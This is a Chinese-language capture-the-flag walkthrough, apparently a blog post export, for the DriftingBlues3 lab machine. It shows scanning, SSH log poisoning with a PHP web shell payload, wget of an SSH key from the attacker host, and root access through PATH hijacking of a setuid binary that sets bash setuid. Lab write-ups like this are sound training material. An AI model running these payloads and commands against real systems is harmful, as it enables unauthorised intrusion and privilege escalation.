superhuman<\/code>\u7684\u65f6\u5019\u53d1\u73b0FUZZ\u65f6\u95f4\u592a\u957f\u4e86\uff0c\u5148\u6362\u4e00\u4e2a\u9776\u673a\u505a\u505a\uff1a<\/p>\n![\"image-20240411122613084\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nOpen 172.20.10.6:22\nOpen 172.20.10.6:80<\/code><\/pre>\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC4uqqKMblsYkzCZ7j1Mn8OX4iKqTf55w3nolFxM6IDIrQ7SV4JthEGqnYsiWFGY0OpwHLJ80\/pnc\/Ehlnub7RCGyL5gxGkGhZPKYag6RDv0cJNgIHf5oTkJOaFhRhZPDXztGlfafcVVw0Agxg3xweEVfU0GP24cb7jXq8Obu0j4bNsx7L0xbDCB1zxYwiqBRbkvRWpiQXNns\/4HKlFzO19D8bCY\/GXeX4IekE98kZgcG20x\/zoBjMPXWXHUcYKoIVXQCDmBGAnlIdaC7IBJMNc1YbXVv7vhMRtaf\/ffTtNDX0sYydBbqbubdZJsjWL0oHHK3Uwf+HlEhkO1jBZw3Aj\n| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDkds8dHvtrZmMxX2P71ej+q+QDe\/MG8OGk7uYjWBT5K\/TZR\/QUkD9FboGbq1+SpCox5qqIVo8UQ+xvcEDDVKaU=\n| 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIoK0bHJ3ceMQ1mfATBnU9sChixXFA613cXEXeAyl2Y2\n80\/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))\n|_http-server-header: Apache\/2.4.38 (Debian)\n|_http-title: Site doesn't have a title (text\/html).\n| http-methods: \n|_ Supported Methods: OPTIONS HEAD GET POST\n| http-robots.txt: 1 disallowed entry \n|_\/eventadmins\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\nferoxbuster -u http:\/\/172.20.10.6 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 2 -s 200 301 302<\/code><\/pre>\nfuzz\u5728\u4f7f\u7528gobuster\uff0c\u8fd9\u91cc\u5c31\u6362\u4e00\u4e2a\u4e86\u3002<\/p>\n
___ ___ __ __ __ __ __ ___\n|__ |__ |__) |__) | \/ ` \/ \\ \\_\/ | | \\ |__\n| |___ | \\ | \\ | \\__, \\__\/ \/ \\ | |__\/ |___\nby Ben "epi" Risher \ud83e\udd13 ver: 2.10.2\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf Target Url \u2502 http:\/\/172.20.10.6\n \ud83d\ude80 Threads \u2502 50\n \ud83d\udcd6 Wordlist \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c Status Codes \u2502 [200, 301, 302]\n \ud83d\udca5 Timeout (secs) \u2502 7\n \ud83e\udda1 User-Agent \u2502 feroxbuster\/2.10.2\n \ud83d\udc89 Config File \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e Extract Links \u2502 true\n \ud83c\udfc1 HTTP methods \u2502 [GET]\n \ud83d\udd03 Recursion Depth \u2502 2\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1 Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n301 GET 9l 28w 316c http:\/\/172.20.10.6\/eventadmins => http:\/\/172.20.10.6\/eventadmins\/\n301 GET 9l 28w 312c http:\/\/172.20.10.6\/privacy => http:\/\/172.20.10.6\/privacy\/\n200 GET 16l 34w 347c http:\/\/172.20.10.6\/tickets.html\n200 GET 7078l 39790w 3674378c http:\/\/172.20.10.6\/cr.png\n200 GET 42l 133w 1373c http:\/\/172.20.10.6\/\n301 GET 9l 28w 311c http:\/\/172.20.10.6\/drupal => http:\/\/172.20.10.6\/drupal\/\n301 GET 9l 28w 311c http:\/\/172.20.10.6\/secret => http:\/\/172.20.10.6\/secret\/\n200 GET 1l 1w 11c http:\/\/172.20.10.6\/Makefile\n301 GET 9l 28w 313c http:\/\/172.20.10.6\/wp-admin => http:\/\/172.20.10.6\/wp-admin\/\n200 GET 97l 823w 7345c http:\/\/172.20.10.6\/wp-admin\/readme.html\n200 GET 1l 3w 20c http:\/\/172.20.10.6\/secret\/devices\n301 GET 9l 28w 315c http:\/\/172.20.10.6\/phpmyadmin => http:\/\/172.20.10.6\/phpmyadmin\/\n[####################] - 20m 1323290\/1323290 0s found:12 errors:243 \n[####################] - 20m 220546\/220546 188\/s http:\/\/172.20.10.6\/ \n[####################] - 20m 220546\/220546 188\/s http:\/\/172.20.10.6\/eventadmins\/ \n[####################] - 20m 220546\/220546 188\/s http:\/\/172.20.10.6\/privacy\/ \n[####################] - 19m 220546\/220546 189\/s http:\/\/172.20.10.6\/drupal\/ \n[####################] - 19m 220546\/220546 189\/s http:\/\/172.20.10.6\/secret\/ \n[####################] - 0s 220546\/220546 1016341\/s http:\/\/172.20.10.6\/wp-admin\/ => Directory listing\n[####################] - 19m 220546\/220546 193\/s http:\/\/172.20.10.6\/phpmyadmin\/ <\/code><\/pre>\nwpscan\u626b\u63cf<\/h3>\n
\u626b\u7684\u65f6\u5019\u5c31\u770b\u5230wp-admin<\/code>\u4e86\uff0c\u731c\u6d4b\u662fwordpress<\/code>\u7ad9\u70b9\uff0c\u626b\u4e00\u4e0b\uff1a<\/p>\nwpscan --url http:\/\/172.20.10.6\/\nScan Aborted: The remote website is up, but does not seem to be running WordPress.<\/code><\/pre>\n\u989d\u3002<\/p>\n
\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div>
\n<\/div><\/p>\n\u8bbf\u95ee\u654f\u611f\u76ee\u5f55<\/h3>\nhttp:\/\/172.20.10.6\/tickets.html<\/code><\/pre>\n<\/div><\/p>\nhttp:\/\/172.20.10.6\/wp-admin\/readme.html\n# \u8fdb\u53bb\u53ea\u6709\u4e00\u4e2a\u6587\u4ef6\uff0c\u5c31\u662f\u8fd9\u4e2a<\/code><\/pre>\n<\/div><\/p>\nhttp:\/\/172.20.10.6\/robots.txt<\/code><\/pre>\nUser-agent: *\nDisallow: \/eventadmins<\/code><\/pre>\nhttp:\/\/172.20.10.6\/eventadmins\/<\/code><\/pre>\nman there's a problem with ssh\njohn said "it's poisonous!!! stay away!!!"\nidk if he's mentally challenged\nplease find and fix it\nalso check \/littlequeenofspades.html\nyour buddy, buddyG<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u6211\u6709\u5199wp\u7684\u4e60\u60ef\u76f4\u63a5\u62ff\u4e0b\uff01<\/p>\n
<\/div>
\n<\/div>
\n<\/div><\/p>\n\u65e5\u5fd7\u6ce8\u5165<\/h3>\n
\u5c1d\u8bd5\u65e5\u5fd7\u6ce8\u5165\uff0c\u8fd9\u662fssh\u767b\u5f55\u7684\u65e5\u5fd7\uff01<\/p>\n
ssh '<?php system($_GET["hack"]);?>'@172.20.10.6<\/code><\/pre>\n\n\u8fd9\u91cc\u4e00\u5b9a\u8981\u68c0\u6d4b\u4e00\u4e0b\u54e6\uff0c\u5426\u5219\u4f20\u8fdb\u53bb\u5c31\u64a4\u4e0d\u56de\u6765\u4e86\uff01<\/p>\n<\/blockquote>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues3]\n\u2514\u2500$ ssh '<?php system($_GET["hack"]);?>'@172.20.10.6\nremote username contains invalid characters\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues3]\n\u2514\u2500$ echo -n "<?php system($_GET["hack"]);?>" | base64\nPD9waHAgc3lzdGVtKCk7Pz4=\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues3]\n\u2514\u2500$ ssh -p 22 PD9waHAgc3lzdGVtKCk7Pz4=@172.20.10.6\nPD9waHAgc3lzdGVtKCk7Pz4=@172.20.10.6: Permission denied (publickey).<\/code><\/pre>\n\u4f46\u662f\u4f7f\u7528\u4e0d\u4e86\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u6362\u4e00\u4e2a\u8001\u4e00\u70b9\u7684\u865a\u62df\u673a\u5c1d\u8bd5\u8fde\u63a5\uff0c\u6211\u8fd9\u91cc\u9009\u62e9\u4f7f\u7528msf\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n
msf6 > use auxiliary\/scanner\/ssh\/ssh_login\nmsf6 auxiliary(scanner\/ssh\/ssh_login) > show options\n\nModule options (auxiliary\/scanner\/ssh\/ssh_login):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password\n BLANK_PASSWORDS false no Try blank passwords for all users\n BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5\n DB_ALL_CREDS false no Try each user\/password couple stored in the current database\n DB_ALL_PASS false no Add all passwords in the current database to the list\n DB_ALL_USERS false no Add all users in the current database to the list\n DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)\n PASSWORD no A specific password to authenticate with\n PASS_FILE no File containing passwords, one per line\n RHOSTS yes The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n RPORT 22 yes The target port\n STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host\n THREADS 1 yes The number of concurrent threads (max one per host)\n USERNAME no A specific username to authenticate as\n USERPASS_FILE no File containing users and passwords separated by space, one pair per line\n USER_AS_PASS false no Try the username as the password for all users\n USER_FILE no File containing usernames, one per line\n VERBOSE false yes Whether to print output for all attempts\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/ssh\/ssh_login) > set rhosts 172.20.10.6\nrhosts => 172.20.10.6\nmsf6 auxiliary(scanner\/ssh\/ssh_login) > set username <?php system($_GET['hack']);?>\nusername => <?php system($_GET[hack]);?>\nmsf6 auxiliary(scanner\/ssh\/ssh_login) > set password 123456\npassword => 123456\nmsf6 auxiliary(scanner\/ssh\/ssh_login) > show options\n\nModule options (auxiliary\/scanner\/ssh\/ssh_login):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password\n BLANK_PASSWORDS false no Try blank passwords for all users\n BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5\n DB_ALL_CREDS false no Try each user\/password couple stored in the current database\n DB_ALL_PASS false no Add all passwords in the current database to the list\n DB_ALL_USERS false no Add all users in the current database to the list\n DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&real\n m)\n PASSWORD 123456 no A specific password to authenticate with\n PASS_FILE no File containing passwords, one per line\n RHOSTS 172.20.10.6 yes The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-me\n tasploit.html\n RPORT 22 yes The target port\n STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host\n THREADS 1 yes The number of concurrent threads (max one per host)\n USERNAME <?php system($_GET[hack]);?> no A specific username to authenticate as\n USERPASS_FILE no File containing users and passwords separated by space, one pair per line\n USER_AS_PASS false no Try the username as the password for all users\n USER_FILE no File containing usernames, one per line\n VERBOSE false yes Whether to print output for all attempts\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/ssh\/ssh_login) > run\n\n[*] 172.20.10.6:22 - Starting bruteforce\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u6210\u529f\u4e86\uff0c\u5c1d\u8bd5\u53cd\u5f39\u56de\u6765\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u5207\u6362robertj\u7528\u6237<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues3]\n\u2514\u2500$ ssh-keygen -t rsa -b 4096 -f \/home\/kali\/temp\/driftingblues3\/driftingblues3\nGenerating public\/private rsa key pair.\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/driftingblues3\/driftingblues3\nYour public key has been saved in \/home\/kali\/temp\/driftingblues3\/driftingblues3.pub\nThe key fingerprint is:\nSHA256:aQNB8\/fPotfco8O1\/l+0EQtVma54etvW3tj+QOl\/RqA kali@kali\nThe key's randomart image is:\n+---[RSA 4096]----+\n| .+ .=|\n| + .o |\n| . . . ... |\n| . o . ooo|\n| S o.++.|\n| . . .EB o+|\n| =o*++|\n| o.=+OB|\n| ...oB*\/|\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues3]\n\u2514\u2500$ ls \ndriftingblues3 driftingblues3.pub\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues3]\n\u2514\u2500$ mv driftingblues3.pub authorized_keys\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues3]\n\u2514\u2500$ python3 -m http.server 8888 \nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n172.20.10.6 - - [11\/Apr\/2024 02:10:09] "GET \/authorized_keys HTTP\/1.1" 200 -<\/code><\/pre>\n(remote) www-data@driftingblues:\/home\/robertj$ ls -la\ntotal 16\ndrwxr-xr-x 3 robertj robertj 4096 Jan 7 2021 .\ndrwxr-xr-x 4 root root 4096 Jan 4 2021 ..\ndrwx---rwx 2 robertj robertj 4096 Jan 4 2021 .ssh\n-r-x------ 1 robertj robertj 33 Jan 7 2021 user.txt\n(remote) www-data@driftingblues:\/home\/robertj$ cd .ssh\n(remote) www-data@driftingblues:\/home\/robertj\/.ssh$ wget http:\/\/172.20.10.8:8888\/authorized_keys\n--2024-04-11 01:10:11-- http:\/\/172.20.10.8:8888\/authorized_keys\nConnecting to 172.20.10.8:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 735 [application\/octet-stream]\nSaving to: 'authorized_keys'\n\nauthorized_keys 100%[=========================================================================>] 735 --.-KB\/s in 0s \n\n2024-04-11 01:10:11 (94.4 MB\/s) - 'authorized_keys' saved [735\/735]<\/code><\/pre>\nssh\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n
(local) pwncat$ lcd temp\/driftingblues3\n(local) pwncat$ connect robertj@172.20.10.6 -i driftingblues3\n[02:12:18] 172.20.10.6:22: normalizing shell path manager.py:957 172.20.10.6:22: loaded known host from db manager.py:957\n(local) pwncat$ \n(remote) robertj@driftingblues:\/home\/robertj$ whoami;id\nrobertj\nuid=1000(robertj) gid=1000(robertj) groups=1000(robertj),1001(operators)<\/code><\/pre>\n\n\u76f4\u63a5ssh robertj@172.20.10.6 -i driftingblues3<\/code>\u4e00\u6837\u7684\u6548\u679c<\/p>\n<\/blockquote>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) robertj@driftingblues:\/home\/robertj$ cat user.txt \n413fc08db21285b1f8abea99040b0280\n(remote) robertj@driftingblues:\/home\/robertj$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/bin\/passwd\n\/usr\/bin\/getinfo\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n(remote) robertj@driftingblues:\/home\/robertj$ ls -l \/usr\/bin\/getinfo\n-r-sr-s--- 1 root operators 16704 Jan 4 2021 \/usr\/bin\/getinfo\n(remote) robertj@driftingblues:\/home\/robertj$ \/usr\/bin\/getinfo\n###################\nip address\n###################\n\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n inet 127.0.0.1\/8 scope host lo\n valid_lft forever preferred_lft forever\n inet6 ::1\/128 scope host \n valid_lft forever preferred_lft forever\n2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n link\/ether 08:00:27:f1:6a:52 brd ff:ff:ff:ff:ff:ff\n inet 172.20.10.6\/28 brd 172.20.10.15 scope global dynamic enp0s3\n valid_lft 79710sec preferred_lft 79710sec\n inet6 fe80::a00:27ff:fef1:6a52\/64 scope link \n valid_lft forever preferred_lft forever\n###################\nhosts\n###################\n\n127.0.0.1 localhost\n127.0.1.1 driftingblues\n\n# The following lines are desirable for IPv6 capable hosts\n::1 localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\n###################\nos info\n###################\n\nLinux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU\/Linux\n(remote) robertj@driftingblues:\/home\/robertj$ file \/usr\/bin\/getinfo\n\/usr\/bin\/getinfo: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=50c270711d2a2d6c688d5c498e50a3d38b4f7ff5, for GNU\/Linux 3.2.0, not stripped\n(remote) robertj@driftingblues:\/home\/robertj$ cd \/usr\/bin\n(remote) robertj@driftingblues:\/usr\/bin$ \n(local) pwncat$ download getinfo\ngetinfo \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 16.7\/16.7 KB \u2022 ? \u2022 0:00:00[02:16:01] downloaded 16.70KiB in 0.58 seconds <\/code><\/pre>\n\u770b\u5230\u4e86\u5947\u602a\u7684\u4e1c\u897f\uff0c\u4e0b\u8f7d\u5230\u672c\u5730\u770b\u770b\uff1a<\/p>\n
\/\/ main.c\nundefined8 main(void)\n{\n setuid(0);\n puts("###################\\nip address\\n###################\\n");\n system("ip a");\n puts("###################\\nhosts\\n###################\\n");\n system("cat \/etc\/hosts");\n puts("###################\\nos info\\n###################\\n");\n system("uname -a");\n return 0;\n}<\/code><\/pre>\n\u5c1d\u8bd5\u66f4\u6539\u73af\u5883\u53d8\u91cf\uff0c\u4f7f\u6211\u4eec\u5199\u7684\u51fd\u6570\u5148\u6267\u884c\uff1a<\/p>\n
(remote) robertj@driftingblues:\/usr\/bin$ ip a\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n inet 127.0.0.1\/8 scope host lo\n valid_lft forever preferred_lft forever\n inet6 ::1\/128 scope host \n valid_lft forever preferred_lft forever\n2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n link\/ether 08:00:27:f1:6a:52 brd ff:ff:ff:ff:ff:ff\n inet 172.20.10.6\/28 brd 172.20.10.15 scope global dynamic enp0s3\n valid_lft 79535sec preferred_lft 79535sec\n inet6 fe80::a00:27ff:fef1:6a52\/64 scope link \n valid_lft forever preferred_lft forever\n(remote) robertj@driftingblues:\/usr\/bin$ echo $PATH\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games:\/sbin:\/usr\/sbin:\/usr\/local\/sbin\n(remote) robertj@driftingblues:\/usr\/bin$ cd \/tmp\n(remote) robertj@driftingblues:\/tmp$ whereis ip\nip: \/usr\/bin\/ip \/usr\/sbin\/ip \/usr\/share\/man\/man8\/ip.8.gz \/usr\/share\/man\/man7\/ip.7.gz\n(remote) robertj@driftingblues:\/tmp$ echo 'chmod +s \/bin\/bash' > ip \n(remote) robertj@driftingblues:\/tmp$ export PATH=$PWD:$PATH\n(remote) robertj@driftingblues:\/tmp$ ip\nUsage: ip [ OPTIONS ] OBJECT { COMMAND | help }\n ip [ -force ] -batch filename\nwhere OBJECT := { link | address | addrlabel | route | rule | neigh | ntable |\n tunnel | tuntap | maddress | mroute | mrule | monitor | xfrm |\n netns | l2tp | fou | macsec | tcp_metrics | token | netconf | ila |\n vrf | sr }\n OPTIONS := { -V[ersion] | -s[tatistics] | -d[etails] | -r[esolve] |\n -h[uman-readable] | -iec | -j[son] | -p[retty] |\n -f[amily] { inet | inet6 | ipx | dnet | mpls | bridge | link } |\n -4 | -6 | -I | -D | -M | -B | -0 |\n -l[oops] { maximum-addr-flush-attempts } | -br[ief] |\n -o[neline] | -t[imestamp] | -ts[hort] | -b[atch] [filename] |\n -rc[vbuf] [size] | -n[etns] name | -a[ll] | -c[olor]}\n(remote) robertj@driftingblues:\/tmp$ echo $PATH\n\/tmp:\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games:\/sbin:\/usr\/sbin:\/usr\/local\/sbin\n(remote) robertj@driftingblues:\/tmp$ chmod +x ip\n(remote) robertj@driftingblues:\/tmp$ ip\nUsage: ip [ OPTIONS ] OBJECT { COMMAND | help }\n ip [ -force ] -batch filename\nwhere OBJECT := { link | address | addrlabel | route | rule | neigh | ntable |\n tunnel | tuntap | maddress | mroute | mrule | monitor | xfrm |\n netns | l2tp | fou | macsec | tcp_metrics | token | netconf | ila |\n vrf | sr }\n OPTIONS := { -V[ersion] | -s[tatistics] | -d[etails] | -r[esolve] |\n -h[uman-readable] | -iec | -j[son] | -p[retty] |\n -f[amily] { inet | inet6 | ipx | dnet | mpls | bridge | link } |\n -4 | -6 | -I | -D | -M | -B | -0 |\n -l[oops] { maximum-addr-flush-attempts } | -br[ief] |\n -o[neline] | -t[imestamp] | -ts[hort] | -b[atch] [filename] |\n -rc[vbuf] [size] | -n[etns] name | -a[ll] | -c[olor]}\n(remote) robertj@driftingblues:\/tmp$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1168776 Apr 17 2019 \/bin\/bash\n(remote) robertj@driftingblues:\/tmp$ ls\nip\nsystemd-private-fa91ead9eb6547fbb2292f8fa0bb8a88-apache2.service-0f3CMc\nsystemd-private-fa91ead9eb6547fbb2292f8fa0bb8a88-systemd-timesyncd.service-UkKFkN\n(remote) robertj@driftingblues:\/tmp$ sudo -l\n-bash: sudo: command not found\n(remote) robertj@driftingblues:\/tmp$ getinfo\n###################\nip address\n###################\n\n###################\nhosts\n###################\n\n127.0.0.1 localhost\n127.0.1.1 driftingblues\n\n# The following lines are desirable for IPv6 capable hosts\n::1 localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\n###################\nos info\n###################\n\nLinux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU\/Linux\n(remote) robertj@driftingblues:\/tmp$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1168776 Apr 17 2019 \/bin\/bash\n(remote) robertj@driftingblues:\/tmp$ \/bin\/bash -p\n(remote) root@driftingblues:\/tmp# whoami;id\nroot\nuid=1000(robertj) gid=1000(robertj) euid=0(root) egid=0(root) groups=0(root),1000(robertj),1001(operators)\n(remote) root@driftingblues:\/tmp# cd \/root\n(remote) root@driftingblues:\/root# ls -la\ntotal 20\ndrwx------ 2 root root 4096 Jan 7 2021 .\ndrwxr-xr-x 18 root root 4096 Dec 17 2020 ..\n-rw------- 1 root root 53 Jan 7 2021 .bash_history\n-r-x------ 1 root root 33 Jan 7 2021 root.txt\n-rw-r--r-- 1 root root 1031 Jan 4 2021 upit\n(remote) root@driftingblues:\/root# cat root.txt \ndfb7f604a22928afba370d819b35ec83<\/code><\/pre>\n\u62ff\u5230flag\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
driftingblues3 \u5728\u505asuperhuman\u7684\u65f6\u5019\u53d1\u73b0FUZZ\u65f6\u95f4\u592a\u957f\u4e86\uff0c\u5148\u6362\u4e00\u4e2a\u9776\u673a\u505a\u505a\uff1a \u4fe1\u606f\u641c […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-526","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/526","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=526"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/526\/revisions"}],"predecessor-version":[{"id":527,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/526\/revisions\/527"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=526"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=526"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=526"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240411122613084\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424518.png\")
<\/div><\/p>\n![\"image-20240411123238251\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424520.png\")
<\/div>![\"image-20240411123249889\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424521.png\")
<\/div><\/p>\n![\"image-20240411123327602\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424522.png\")
<\/div><\/p>\n![\"image-20240411123440945\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424523.png\")
<\/div><\/p>\n![\"image-20240411131620733\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424524.png\")
<\/div>![\"image-20240411131630923\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424525.png\")
<\/div><\/p>\n![\"image-20240411131748092\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424526.png\")
